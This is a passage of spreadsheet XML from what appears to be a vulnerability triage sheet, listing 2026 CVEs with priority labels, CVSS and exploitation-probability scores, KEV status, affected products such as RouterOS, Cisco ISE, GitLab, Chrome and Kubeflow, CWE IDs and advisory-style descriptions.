          <t>active</t>
        </is>
      </c>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr"/>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains a missing authentication for critical function vulnerability which allows kernel memory disclosure and denial of service in the btest service.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D12" s="5" t="inlineStr"/>
      <c r="E12" s="5" t="inlineStr"/>
      <c r="F12" s="5" t="inlineStr"/>
      <c r="G12" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr"/>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12"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12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr"/>
      <c r="E13" s="5" t="inlineStr"/>
      <c r="F13" s="5" t="inlineStr"/>
      <c r="G13" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H13" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I13" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr"/>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84869</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr"/>
      <c r="E14" s="5" t="inlineStr"/>
      <c r="F14" s="5" t="inlineStr"/>
      <c r="G14" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H14" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I14" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>connectwise:screenconnect</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr"/>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>ConnectWise ScreenConnect contains both an improper privilege management and missing authorization vulnerability that may allow an attacker to transfer and execute files through an active remote session without authorization or host confirmation.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="inlineStr"/>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H15" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I15" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr"/>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15"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S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr"/>
      <c r="F16" s="5" t="inlineStr"/>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H16" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I16" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr"/>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains an improper neutralization of argument delimiters in a command vulnerability which allows an attacker to change the trusted RouterOS policy mask, leading to privilege escalation.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87886</t>
        </is>
      </c>
      <c r="D17" s="5" t="inlineStr"/>
      <c r="E17" s="5" t="inlineStr"/>
      <c r="F17" s="5" t="inlineStr"/>
      <c r="G17" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>KEV</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr"/>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S17"/>
  <conditionalFormatting sqref="E2:E1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7">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6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Newly scored</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75650</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R2"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S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86218</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>n-able:n-central</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-96</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>N-central is vulnerable to a pre-auth remote code execution This issue affects N-central: before 2026.3.1.14.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54745</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-918</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>Kubeflow Pipelines enables users to build and deploy portable, scalable machine learning workflows. Prior to 2.17.0, the Kubeflow Pipelines frontend exposes an unauthenticated server-side request forgery vulnerability through the /_proxy/ route in frontend/server/proxy-middleware.ts. The _routePathWithReferer() function accepts an arbitrary attacker-controlled HTTP or HTTPS target and passes its origin to createProxyMiddleware without a host allowlist or filtering for loopback, link-local, RFC1918, or cluster-local addresses. The route remains outside the authorization middleware when ENABLE_AUTHZ=true and is reachable through /apis/v1beta1/_proxy/, /apis/v2beta1/_proxy/, /pipeline/apis/v1beta1/_proxy/, and /pipeline/apis/v2beta1/_proxy/, including through a crafted Referer header. Requests can forward attacker-controlled methods, headers such as Authorization, Cookie, and X-Forwarded-For, and POST bodies to reachable internal services, while returning the upstream response to the unauthenticated client. This can expose cloud metadata credentials, Kubernetes or service APIs, and other cluster-internal endpoints to unauthorized read or modification. This issue is fixed in version 2.17.0.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54745</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65956</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>KubePi is a Kubernetes multi-cluster management panel. In versions up to and including 1.6.15, the SSO configuration API endpoints are exposed on the same public routing boundary as the SSO login and callback endpoints, so SSO, OIDC, and SAML management operations can be reached without administrator authorization. Because reading, creating, and updating the global SSO configuration is not restricted to administrators, an unauthorized or low-privileged user can inspect or alter the authentication configuration, which under certain conditions can lead to account takeover or privilege escalation. The SSO connectivity-test function can additionally be abused as a server-side request forgery primitive, and the user list API returns user objects without consistently clearing authentication-related fields. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65956</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79696</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>A Code Injection vulnerability in adk web in Google Cloud Agent Development Kit (ADK) for Python versions 2.0.0 through 2.6.0 on Python (OSS), Cloud Run, and GKE environments where pytest is installed allows an unauthenticated remote attacker to execute arbitrary code using a crafted test session replay.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79696</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85061</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>MapLibre GL JS is an interactive vector tile map library for web browsers. Prior to 6.4.1, DOM.sanitize() in src/util/dom.ts iterates elem.attributes as a live NamedNodeMap while removeAttributes() removes attributes from the same collection, shifting indexes and skipping an adjacent dangerous attribute. An attacker who controls untrusted third-party style attribution strings or user-supplied custom attributions can supply consecutive dangerous attributes, causing an attribute such as onload or ontoggle to survive sanitization and execute when the attribution control inserts the content into innerHTML. A victim must render the affected map content for the script to execute. This issue is fixed in version 6.4.1.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85978</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>security@puppet.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-41, CWE-863, CWE-94</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote code execution vulnerability exists in the Policy Manager console of Akana API Platform. A path normalization discrepancy between the authentication filter and the servlet dispatcher allows a crafted request to bypass authentication and reach an endpoint that evaluates attacker-supplied script code without sandboxing, resulting in arbitrary code execution. Exploitation requires no authentication or user interaction.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85978</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87827</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>Certain KGUARD DVR devices running vulnerable firmware expose a system command execution service on all network interfaces without requiring authentication. A remote unauthenticated attacker with network access to the affected service can execute arbitrary system commands on the device, potentially resulting in complete compromise of the DVR.
The vulnerability is known to have been exploited in the wild by the Mirai_ptea (Rimasuta) and Mirai_aurora botnets for malware propagation and subsequent DDoS activity. The vulnerability was reported to affect firmware dating from 2016, while firmware released after 2017 appears to mitigate the issue by restricting the affected service to the localhost interface (127.0.0.1) instead of exposing it on all interfaces (0.0.0.0).
The affected-device list reported by Netlab includes many D1004NR, D1008NR, D1016NR, D1104, D1104NR, D1108NR, D1116NR, D1132NR, D2116NR, D97xx, D98xx, and D99xx variants and several associated hardware revisions
The exploit is included in some version of rapperbot and exploited in 2026. This assignment has been made to document the active exploitation and lack of documentation from the vendor.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87827</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
